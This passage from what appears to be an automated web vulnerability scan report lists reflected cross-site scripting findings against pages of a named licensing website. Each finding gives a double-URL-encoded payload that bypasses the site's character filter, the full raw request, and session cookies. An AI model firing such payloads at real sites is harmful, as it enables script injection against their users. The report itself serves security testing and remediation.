This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /3_ring_binders?83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.161. http://www.turnerlicensing.com/3_subject_notebooks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/3_subject_notebooks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f63ec'style='x:expression(alert(1))'5164698b3fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /3_subject_notebooks?f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.162. http://www.turnerlicensing.com/5x8_notepads [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/5x8_notepads
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1bbd7'style='x:expression(alert(1))'3ded6a6acc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /5x8_notepads?1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.163. http://www.turnerlicensing.com/5x8_planners [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/5x8_planners
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dec49'style='x:expression(alert(1))'b65b930df92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /5x8_planners?dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.164. http://www.turnerlicensing.com/MLB [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/MLB
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8600f'style='x:expression(alert(1))'40335c5bc15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /MLB?8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.165. http://www.turnerlicensing.com/NBA [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1530%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b802c6ba968 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1530'style='x:expression(alert(1))'b802c6ba968 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
2.166. http://www.turnerlicensing.com/NBA/boston_celtics [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/boston_celtics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d38e8'style='x:expression(alert(1))'8d6ba417d1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/boston_celtics?d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.167. http://www.turnerlicensing.com/NFL [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NFL
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4bff4'style='x:expression(alert(1))'467f646483f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NFL?4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.168. http://www.turnerlicensing.com/NHL [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NHL
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c378'style='x:expression(alert(1))'55966d0d35d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NHL?9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.169. http://www.turnerlicensing.com/Players [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/Players
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 830e5'style='x:expression(alert(1))'65ac4008624 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Players?830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.170. http://www.turnerlicensing.com/Stadiums [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/Stadiums
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c355'style='x:expression(alert(1))'2ca472c83b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Stadiums?4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.171. http://www.turnerlicensing.com/Turner-Contact-Us [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/Turner-Contact-Us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6dd9c'style='x:expression(alert(1))'7f7d614df6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Turner-Contact-Us?6dd9c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25277f7d614df6b=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.172. http://www.turnerlicensing.com/Turner-Email-Sign-Up [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/Turner-Email-Sign-Up
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41989'style='x:expression(alert(1))'cc1e08c1a24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Turner-Email-Sign-Up?41989%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cc1e08c1a24=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.173. http://www.turnerlicensing.com/book_covers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/book_covers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c755e'style='x:expression(alert(1))'f5f16d43fab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /book_covers?c755e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f5f16d43fab=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.174. http://www.turnerlicensing.com/box_calendars [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/box_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45e75'style='x:expression(alert(1))'5e5156453d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /box_calendars?45e75%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275e5156453d=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.175. http://www.turnerlicensing.com/composition_books [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/composition_books
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68ea5'style='x:expression(alert(1))'2936e399c82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /composition_books?68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.176. http://www.turnerlicensing.com/desk_calendars [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/desk_calendars
Issue detail
